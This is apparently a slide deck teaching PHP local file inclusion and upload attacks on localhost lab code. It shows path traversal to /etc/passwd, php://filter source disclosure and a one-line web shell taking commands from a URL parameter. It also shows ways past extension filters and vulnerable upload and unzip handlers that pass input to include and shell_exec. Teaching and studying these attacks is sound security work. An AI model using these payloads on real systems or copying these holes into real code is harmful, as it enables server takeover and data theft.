LFI

Local File Inclusion

by @terjanq

<?php
    if(isset($_GET['page']))
        include($_GET['page']);
    else 
        include('home');
?>

http://localhost/semhack/codes/simple_include.php?page=../../../../../etc/passwd

http://localhost/semhack/codes/simple_include.php?page=home

http://localhost/semhack/codes/simple_include.php?page=flag.php

How to read .php sources?

Wrappers

php://filter

?page=php://filter/convert.base64-encode/resource=flag.php

allow_url_include

php://input

php://input

http://

data://

Sessions

<?php
session_start();

if(isset($_GET["secret"])){
    $_SESSION["secret"] = $_GET["secret"];
}
if(isset($_SESSION["secret"])){
    echo "Your secret: ".$_SESSION["secret"];
}
else{
    echo "Visit <a href='?secret={your_secret}'>"
        ."?secret={your_secret}</a> to set a secret.";
}

?>

File upload 

<?php
    $url = FALSE;
    if(isset($_POST['submit'])){
        $target_dir = "uploads/";
        $parts = explode('.', basename($_FILES["file"]["name"]));
        $url = $target_dir.uniqid().'.'.$parts[1];
        move_uploaded_file($_FILES["file"]["tmp_name"], $url);
    }
?>
<html>
<body>

<?php
    if($url !== FALSE)
        echo "File uploaded to: <a href='$url'>$url</a><br>";
?>
<form action="upload.php" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="file" id="file">
    <input type="submit" value="Upload Image" name="submit">
</form>
</body>
</html>
<!-- shell.php -->
<?php 
system($_GET['c']);

http://localhost/semhack/codes/uploads/5bf70ba2ef215.php?c=id

Shell!

Maybe filters?

if(strtolower($parts[1]) === 'php'){
    die('no .php extension allowed!');
}

What exactly PHP is?

<FilesMatch "\.ph(p[2-6]?|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>

Don't trust the Internet!

$ cat /etc/apache2/mods-available/php7.2.conf

.php suffix

<?php
    $url = FALSE;
    if(isset($_POST['submit'])){
        $target_dir = "uploads/";
        $parts = explode('.', basename($_FILES["file"]["name"]));
        if( substr(strtolower($parts[1]), 0, 2)  === 'ph'){
            die('no .ph* extension allowed!');
        }
        $url = $target_dir.uniqid().'.'.$parts[1];
        move_uploaded_file($_FILES["file"]["tmp_name"], $url);
    }

    if(isset($_GET['page'])){
        include($_GET['page'].'.php');
    }
    else{
        include('home.php');
    }
?>

Does it look dangerous?

phar once more!

More zips 

<?php
    $url = FALSE;
    if(isset($_POST['submit'])){
        $target_dir = "uploads/";
        $filename = basename($_FILES["file"]["name"]);
        $tmpname = $_FILES["file"]["tmp_name"];
        if( substr(explode('.', $filename)[1], 0, 3)  !== 'zip'){
            die('only zip archives allowed!');
        }
        
        $extract_path = 'extracted/'.uniqid('zip_');
        if(!is_dir('extracted')) mkdir('extracted'); 
        mkdir($extract_path);

        $res = shell_exec("unzip $tmpname -d $extract_path");
        if ($res !== FALSE) {
            echo "Files extracted to: <a href='$extract_path'>".
                 "$extract_path</a><br>";   
        } else {
            die("error occured!");
        }
    }

Live Code!

Made with Slides.com